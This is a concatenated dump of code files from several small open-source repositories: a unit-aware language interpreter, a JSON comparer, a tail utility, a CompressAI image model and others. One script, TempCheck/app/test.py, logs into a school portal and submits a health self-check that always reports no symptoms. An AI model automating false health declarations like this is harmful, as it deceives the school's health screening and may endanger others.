ax_1.set_ylabel("(self-)BLEU")
ax_2.set_ylabel("Acc")
line_list = []
line_label_list = []
if (dev_bleu_record!=None).all():
# l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4', label="dev BLEU")
l, = ax_1.plot(eval_gs_record, dev_bleu_record, '-', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev BLEU")
# l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4', label="dev self-BLEU")
l, = ax_1.plot(eval_gs_record, dev_self_bleu_record, ':', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev self-BLEU")
# l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4', label="dev acc")
l, = ax_2.plot(eval_gs_record, dev_acc_record, '--', c='#1f77b4')
line_list.append(l)
line_label_list.append("dev acc")
plt.legend(line_list, line_label_list)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu_and_acc.pdf"), format='pdf') # bbox_inches='tight'
plt.close()
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
plt.close()
``` |
{
"source": "0ED/UnitX",
"score": 3
} |
#### File: UnitX/src/intro_line.py
```python
def get_line():
"""Gets a string of logo for intaractive run.
Returns:
A string of logo.
Advice:
Use a command for generating LOGO.
$ figlet -kw 120 -f slant UnitX
$ jp2a -i --width=30 --chars=" XY" --output=sample.txt unit_logo.jpg
"""
import time
now_time = time.ctime(time.time())
ascii_art = """\
__ __ _ __ _ __
/ / / /____ (_)/ /_| |/ /
/ / / // __ \ / // __/| /
/ /_/ // / / // // /_ / |
\____//_/ /_//_/ \__//_/|_|
"""
unitx_info = """\
UnitX 0.7.0 (%s)""" % (now_time)
#Type "help" or "demo <number(0-2)>" for UnitX life.
console_info = ascii_art + unitx_info
return console_info
if __name__ == '__main__':
print get_line()
"""LOGO memo
______
____ / \_
/ \——-| \
/ \
| |
|_ \
|________ /
____| /
/ /\__/
/ __ |
| / \_ \__________
| | \ |
|____| |____________|
__ __ _ __ _ __
/ / / /____ (_)/ /_| |/ /
/ / / // __ \ / // __/| /
/ /_/ // / / // // /_ / |
\____//_/ /_//_/ \__//_/|_|
"""
```
#### File: UnitX/unitx/simulator.py
```python
import sys
import os
from unitx_object import UnitXObject
from unit_manager import UnitManager
from scope_list import ScopeList
from constants import Constants
class Simulator(object):
"""A class simulating a scope and a manager.
Attributes:
__scopes: An instance indicating a ScopeList class (a list structure).
__manager: An instance indicating a UnitManager class.
"""
def __init__(self):
"""Inits and sets a unit manager and a scope list."""
this_dir, _ = os.path.split(__file__)
data_path = os.path.join(this_dir, Constants.SYSTEM_UNIT_DATA)
self.__manager = UnitManager(data_path)
self.__scopes = ScopeList()
def get_scopes(self):
"""Returns scopes for saving variables.
Returns:
An instance indicating a ScopeList class (a list structure).
"""
return self.__scopes
def get_manager(self):
"""Returns a unit manager.
Returns:
An instance indicating a UnitManager class.
"""
return self.__manager
def main():
"""Run an example for a Unit class."""
from simulator import Simulator
s = Simulator()
print s.get_scopes()
s.get_scopes().del_scope()
print s.get_scopes()
if __name__ == '__main__':
sys.exit(main())
```
#### File: UnitX/unitx/unit.py
```python
import sys
from collegue import Collegue
from constants import Constants
class Unit(Collegue):
"""A class which has an infomation of a unit.
And this class can calculate between units by a function
which this class has.
Attributes:
ex_numer: A string indicating a numer of unit which used in the past.
numer: A string indicating a current numer.
ex_denom: A string indicating a denom of unit which used in the past.
denom: A string indicating a current denom.
token: An instance of Token class indicating the head of a unit statement.
Examples:
{MB}, {kg->g}, {m/s}, {km->m}, {km->m/s->h}
A data structure: { <ex_numer> -> <numer> / <ex_denom> -> <denom> }
"""
def __init__(self, ex_numer=None, numer=None, ex_denom=None, denom=None, token=None):
"""Inits attributes of a Unit class."""
self.token = token
self.ex_numer = ex_numer
self.numer = numer
self.ex_denom = ex_denom
self.denom = denom
def replace_tokens(self):
"""Replaces unit tokens to new unit tokens by finding in scopes."""
tokens = [self.ex_numer, self.numer, self.ex_denom, self.denom]
new_tokens = []
for t in tokens:
found_scope = self.mediator.get_scopes().peek().find_scope_of(t)
if found_scope:
unitx_obj = found_scope[t]
new_tokens.append(unitx_obj.get_value())
else:
new_tokens.append(t)
self.ex_numer, self.numer, self.ex_denom, self.denom = new_tokens
return
def remove_ex(self):
"""Removes varibles of ex_numer and ex_denom which don't need
for displaying on CLI.
"""
self.ex_numer = self.ex_denom = None
return
def is_empty(self):
"""Returns whether attributes of Unit are an empty.
Returns:
A bool indicating whether attributes of Unit are an empty.
"""
return self.ex_numer == self.numer == self.ex_denom == self.denom == None
def __notifyEasily(self, unit, opp_token):
"""Notify an error(notifyErrorListeners) easily.
Args:
self: An instance indicating a Unit class which probably has an error.
unit: An instance indicating a Unit class which probably has an error.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Raises:
TypeError: An error occurred by a difference of a unit type.
"""
msg = Constants.TYPE_ERR_UNSUPPORTED_UNIT % (opp_token.text, self.formal_str(), unit.formal_str())
self.mediator.get_parser().notifyErrorListeners(msg, opp_token, Exception(msg))
return
def add(self, unit, opp_token):
"""Returns a unit added self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> + <unit> -> <result>
{km} + {} -> {km}
{km} + {km} -> {km}
{km/s} + {km/s} -> {km/s}
"""
if self.numer == unit.numer and self.denom == unit.denom: return self
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def subtract(self, unit, opp_token):
"""Returns a unit subtracted self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> - <unit> -> <result>
{km} - {} -> {km}
{km} - {km} -> {km}
{km/s} - {km/s} -> {km/s}
"""
return self.add(unit, opp_token)
def multiply(self, unit, opp_token):
"""Returns a unit multiplied self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> * <unit> -> <result>
{km} * {} -> {km}
{km/s} * {s} -> {km}
"""
if self.numer == unit.denom: return Unit(numer=unit.numer)
elif self.denom == unit.numer: return Unit(numer=self.numer)
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def divide(self, unit, opp_token):
"""Returns a unit divided self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> / <unit> -> <result>
{km} / {km} -> {}
{km} / {s} -> {km/s}
{km} / {km/s} -> {s}
"""
if self.numer == unit.numer and self.denom == unit.denom: return Unit()
elif (not self.denom) and self.numer == unit.numer: return Unit(numer=unit.denom)
elif self.is_empty(): return unit
elif unit.is_empty(): return self
else:
self.__notifyEasily(unit, opp_token)
return
def modulo(self, unit, opp_token):
"""Returns a unit calculated a modulo of self and unit.
Args:
self: An instance indicating a Unit class.
unit: An instance indicating a Unit class.
opp_token: An instance indicating a Token class reporting an error
on the listener(EvalErrorListener).
Examples:
<self> % <unit> -> <result>
{km} % {km} -> {}
{km} % {s} -> {km/s}
{km} % {km/s} -> {s}
"""
return self.divide(unit, opp_token)
def equals(self, unit):
"""Returns whether self unit equals a unit of arguments.
Returns:
A bool indicating whether self unit equals a unit of arguments.
"""
return self.numer == unit.numer and self.denom == unit.denom
def formal_str(self):
"""Returns a formal string displaying on CLI.
Returns:
A string displaying on CLI.
"""
if self.numer and self.denom:
return '{%s/%s}' % (self.numer, self.denom)
elif self.numer and not self.denom:
return '{%s}' % (self.numer)
else:
return ''
def __unicode__(self):
"""Returns a string of attributes.
Returns:
res: A string of attributes infomations.
"""
res = "<%s: {%s->%s/%s->%s}>" % (self.__class__.__name__, self.ex_numer, self.numer, self.ex_denom, self.denom)
return res
def __str__(self):
"""Returns an encoded string of attributes.
Returns:
An encoded string of attributes.
"""
return unicode(self).encode('utf-8')
def __repr__(self):
"""Returns a string of attributes.
Returns:
A string of a result of a __str__() function.
"""
return self.__str__()
@classmethod
def set_mediator(self, mediator):
"""Sets a mediator for Mediator pattern of GoF.
Args:
mediator: An instance of a EvalVisitor class inherited Mediator class.
"""
self.mediator = mediator
return
def main():
"""Run an example for a Unit class."""
#
# Checks printing a Unit object.
#
print Unit(u'分', u'時', None, None)
print Unit(u'm', u'km', None, u'時')
#
# add() demo
#
print '-' * 10
opp_token = None
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s + %s -> %s" % (left.formal_str(), right.formal_str(), left.add(right, opp_token).formal_str())
#
# subtract() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s - %s -> %s" % (left.formal_str(), right.formal_str(), left.subtract(right, opp_token).formal_str())
#
# multiply() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None)
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, None, None, None)
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
left, right = Unit(None, None, None, None), Unit(None, u'km', None, u'時')
print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token).formal_str())
#left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
#print "%s * %s -> %s" % (left.formal_str(), right.formal_str(), left.multiply(right, opp_token)) #error
#
# divide() demo
#
print '-' * 10
left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, u'時')
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, u'時'), Unit(None, u'km', None, u'時')
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, u'km', None, None)
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
left, right = Unit(None, u'km', None, None), Unit(None, None, None, None)
print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token).formal_str())
#left, right = Unit(None, u'km', None, u'時'), Unit(None, u'時', None, None)
#print "%s / %s -> %s" % (left.formal_str(), right.formal_str(), left.divide(right, opp_token)) #error
return Constants.EXIT_SUCCESS
if __name__ == '__main__':
sys.exit(main())
```
#### File: UnitX/unitx/UnitXListener.py
```python
from antlr4 import *
# This class defines a complete listener for a parse tree produced by UnitXParser.
class UnitXListener(ParseTreeListener):
# Enter a parse tree produced by UnitXParser#program.
def enterProgram(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#program.
def exitProgram(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#typeDeclaration.
def enterTypeDeclaration(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#typeDeclaration.
def exitTypeDeclaration(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#functionDeclaration.
def enterFunctionDeclaration(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#functionDeclaration.
def exitFunctionDeclaration(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameters.
def enterFormalParameters(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameters.
def exitFormalParameters(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameterList.
def enterFormalParameterList(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameterList.
def exitFormalParameterList(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#formalParameter.
def enterFormalParameter(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#formalParameter.
def exitFormalParameter(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#block.
def enterBlock(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#block.
def exitBlock(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#blockStatement.
def enterBlockStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#blockStatement.
def exitBlockStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#statement.
def enterStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#statement.
def exitStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#repStatement.
def enterRepStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#repStatement.
def exitRepStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#ifStatement.
def enterIfStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#ifStatement.
def exitIfStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expressionStatement.
def enterExpressionStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expressionStatement.
def exitExpressionStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#printStatement.
def enterPrintStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#printStatement.
def exitPrintStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#assertStatement.
def enterAssertStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#assertStatement.
def exitAssertStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#dumpStatement.
def enterDumpStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#dumpStatement.
def exitDumpStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#borderStatement.
def enterBorderStatement(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#borderStatement.
def exitBorderStatement(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expressionList.
def enterExpressionList(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expressionList.
def exitExpressionList(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#parExpression.
def enterParExpression(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#parExpression.
def exitParExpression(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#repControl.
def enterRepControl(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#repControl.
def exitRepControl(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#endRep.
def enterEndRep(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#endRep.
def exitEndRep(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#expression.
def enterExpression(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#expression.
def exitExpression(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unit.
def enterUnit(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unit.
def exitUnit(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def enterUnitSingleOrPairOperator(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def exitUnitSingleOrPairOperator(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#unitOperator.
def enterUnitOperator(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#unitOperator.
def exitUnitOperator(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#primary.
def enterPrimary(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#primary.
def exitPrimary(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#literal.
def enterLiteral(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#literal.
def exitLiteral(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#string.
def enterString(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#string.
def exitString(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#halfString.
def enterHalfString(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#halfString.
def exitHalfString(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#number.
def enterNumber(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#number.
def exitNumber(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#integer.
def enterInteger(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#integer.
def exitInteger(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#boolean.
def enterBoolean(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#boolean.
def exitBoolean(self, ctx):
pass
# Enter a parse tree produced by UnitXParser#none.
def enterNone(self, ctx):
pass
# Exit a parse tree produced by UnitXParser#none.
def exitNone(self, ctx):
pass
```
#### File: UnitX/unitx/UnitXVisitor.py
```python
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by UnitXParser.
class UnitXVisitor(ParseTreeVisitor):
# Visit a parse tree produced by UnitXParser#program.
def visitProgram(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#typeDeclaration.
def visitTypeDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#functionDeclaration.
def visitFunctionDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameters.
def visitFormalParameters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameterList.
def visitFormalParameterList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#formalParameter.
def visitFormalParameter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#block.
def visitBlock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#blockStatement.
def visitBlockStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repStatement.
def visitRepStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#ifStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#printStatement.
def visitPrintStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#assertStatement.
def visitAssertStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#dumpStatement.
def visitDumpStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#borderStatement.
def visitBorderStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expressionList.
def visitExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#parExpression.
def visitParExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#repControl.
def visitRepControl(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#endRep.
def visitEndRep(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unit.
def visitUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def visitUnitSingleOrPairOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitOperator.
def visitUnitOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#string.
def visitString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#halfString.
def visitHalfString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#number.
def visitNumber(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#integer.
def visitInteger(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#boolean.
def visitBoolean(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#none.
def visitNone(self, ctx):
return self.visitChildren(ctx)
``` |
{
"source": "0-errors-0-warnings/mongodb-compare",
"score": 3
} |
#### File: 0-errors-0-warnings/mongodb-compare/compare.py
```python
import json
import os
def load_json_file(file_name):
with open(file_name, 'r') as f:
return json.load(f)
def to_key(key1, key2):
return f'{key1}/{key2}'
def compare_items(item1, item2, key_path):
#print(item1)
#print(item2)
for key, value in item1.items():
if key not in item2.keys():
print(f'key "{to_key(key_path, key)}" missing from target')
else:
if type(value) is dict:
compare_items(value, item2[key], f'{to_key(key_path, key)}')
elif value != item2[key]:
print(f'value mismatch for key "{to_key(key_path, key)}". src: {value}, tgt: {item2[key]}')
item1 = load_json_file('data/1.json')
item2 = load_json_file('data/2.json')
print('src: 1.json, tgt: 2.json')
compare_items(item1, item2, '.')
print('\n\n')
print('src: 2.json, tgt: 1.json')
compare_items(item2, item1, '.')
``` |
{
"source": "0eu/tail-assignment",
"score": 3
} |
#### File: tail-assignment/tail/core.py
```python
import os
from typing import Generator, TextIO
BUFFER_SIZE = 1
LINE_BREAK_CHAR = "\n"
def read_last_lines(fh: TextIO, lines: int = 10) -> Generator[str, None, None]:
fh.seek(0, os.SEEK_END)
found_lines = 0
for offset in range(fh.tell() - 1, -1, -1):
fh.seek(offset)
if fh.read(BUFFER_SIZE) == LINE_BREAK_CHAR:
found_lines += 1
if found_lines > lines:
break
if found_lines <= lines:
fh.seek(0)
while (line := fh.readline()) and line and found_lines > 0:
yield line
found_lines -= 1
def follow_lines(fh: TextIO) -> Generator[str, None, None]:
while True:
yield from fh.readlines()
```
#### File: tail-assignment/utils/generate_logs.py
```python
import hashlib
from time import sleep
from random import randint
from datetime import datetime
LOGS_FILENAME = 'tests/test_data/logs_stream.log'
DELIMITER = '\t'
LINE_BREAKER = '\n'
def write(log_filename: str, logs):
with open(log_filename, 'a') as file_handler:
for log in logs:
file_handler.write(log)
def generate_logs(count: int):
assert count > 0, "Number of log entries should be more than 0"
return (generate_row() for _ in range(count))
def generate_row():
return DELIMITER.join((get_today_date(), generate_random_hash(), LINE_BREAKER))
def get_today_date():
return datetime.today().strftime("%d/%m/%y %H:%M:%S")
def generate_random_hash() -> str:
return hashlib.md5(str(randint(1, 1000)).encode()).hexdigest()
def main():
while True:
sleep_duration = randint(1, 5)
logs_count = randint(20, 25)
print(f'Writing {logs_count} logs to {LOGS_FILENAME}')
write(LOGS_FILENAME, generate_logs(logs_count))
sleep(sleep_duration)
if __name__ == '__main__':
main()
``` |
{
"source": "0ev/TempCheck",
"score": 3
} |
#### File: TempCheck/app/test.py
```python
import requests
from bs4 import BeautifulSoup
global USER_AGENT
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
def initialize(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'DNT': '1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://ksa.hs.kr/Account/Login', headers=headers)
def get_login_token(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Referer': 'https://www.ksa.hs.kr/',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://www.ksa.hs.kr/Account/Login', headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"]
return result
def make_data(login_token,id,password):
return f'''-----------------------------<PASSWORD>1506
Content-Disposition: form-data; name="__RequestVerificationToken"
{login_token}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="UserId"
{str(id)}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="Password"
{str(password)}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="UserType"
학생
-----------------------------325333128821718686562724141506--
'''
def login(s,login_token,id,password):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------325333128821718686562724141506',
'Origin': 'https://ksa.hs.kr',
'DNT': '1',
'Connection': 'keep-alive',
'Referer': 'https://ksa.hs.kr/Account/Login',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.post('https://ksa.hs.kr/Account/Login', data = make_data(login_token,id,password).encode("utf-8"), headers=headers)
def get_check_token(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Referer': 'https://www.ksa.hs.kr/',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://www.ksa.hs.kr/SelfHealthCheck/Index/200', headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"]
return result
def check(s,check_token,okay):
okay_data = {
'__RequestVerificationToken': check_token,
'SelfCheckItemDatas[0].Order': '1',
'SelfCheckItemDatas[1].Order': '2',
'SelfCheckItemDatas[2].Order': '3',
'survey_q1': 'False',
'SelfCheckItemDatas[0].CheckResultValues[0]': '0',
'survey_q2': 'False',
'SelfCheckItemDatas[1].CheckResultValues[0]': '0',
'survey_q3': 'False',
'SelfCheckItemDatas[2].CheckResultValues[0]': '0'
}
not_okay_data = {
'__RequestVerificationToken': check_token,
'SelfCheckItemDatas[0].Order': '1',
'SelfCheckItemDatas[1].Order': '2',
'SelfCheckItemDatas[2].Order': '3',
'survey_q1': 'True',
'SelfCheckItemDatas[0].CheckResultValues[0]': '1',
'survey_q2': 'True',
'SelfCheckItemDatas[1].CheckResultValues[0]': '1',
'survey_q3': 'True',
'SelfCheckItemDatas[2].CheckResultValues[0]': '1'
}
if okay:
data = okay_data
elif not okay:
data = not_okay_data
headers = {
'User-Agent': USER_AGENT,
'Accept': '*/*',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'https://www.ksa.hs.kr',
'Connection': 'keep-alive',
'Referer': 'https://www.ksa.hs.kr/SelfHealthCheck/Index/200',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.post('https://www.ksa.hs.kr/SelfHealthCheck/index/200', headers=headers, data=data)
return response.json()
def run(id,password):
with requests.Session() as s:
login_token = "<PASSWORD>"
login(s,login_token,id,password)
check_token = get_check_token(s)
result = check(s, check_token, True)
return result
``` |
{
"source": "0F0F/CompressAI",
"score": 2
} |
#### File: CompressAI/examples/model.py
```python
import argparse
import struct
import sys
import time
import math
import random
import shutil
import sys
from pathlib import Path
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from PIL import Image
from torchvision.transforms import ToPILImage, ToTensor
from torch.utils.data import DataLoader
from torchvision import transforms
import compressai
from compressai.datasets import ImageFolder
from compressai.layers import GDN
from compressai.models import CompressionModel
from compressai.models.utils import conv, deconv, update_registered_buffers
from compressai.entropy_models import EntropyBottleneck, GaussianConditional
from compressai.transforms import RGB2YCbCr, YCbCr2RGB# tensor -> tensor
from compressai.models import ScaleHyperprior
metric_ids = {
"mse": 0,
}
# From Balle's tensorflow compression examples
SCALES_MIN = 0.11
SCALES_MAX = 256
SCALES_LEVELS = 64
def get_scale_table(
min=SCALES_MIN, max=SCALES_MAX, levels=SCALES_LEVELS
): # pylint: disable=W0622
return torch.exp(torch.linspace(math.log(min), math.log(max), levels))
class ScaleHyperprior_YUV(CompressionModel):
r"""Scale Hyperprior model from <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>: `"Variational Image Compression with a Scale Hyperprior"
<https://arxiv.org/abs/1802.01436>`_ Int. Conf. on Learning Representations
(ICLR), 2018.
Args:
N (int): Number of channels
M (int): Number of channels in the expansion layers (last layer of the
encoder and last layer of the hyperprior decoder)
"""
def __init__(self, N, M, **kwargs):
super().__init__(entropy_bottleneck_channels=N, **kwargs)
self.rgb2yuv = RGB2YCbCr()
self.yuv2rgb = YCbCr2RGB()
_N = N // 2
_M = M // 2
# LUMA
self.g_a_luma = nn.Sequential(
conv(1, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _M),
)
self.g_s_luma = nn.Sequential(
deconv(_M, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, 1),
)
# CHROMA
self.g_a_chroma = nn.Sequential(
conv(2, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _M),
)
self.g_s_chroma = nn.Sequential(
deconv(_M, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, 2),
)
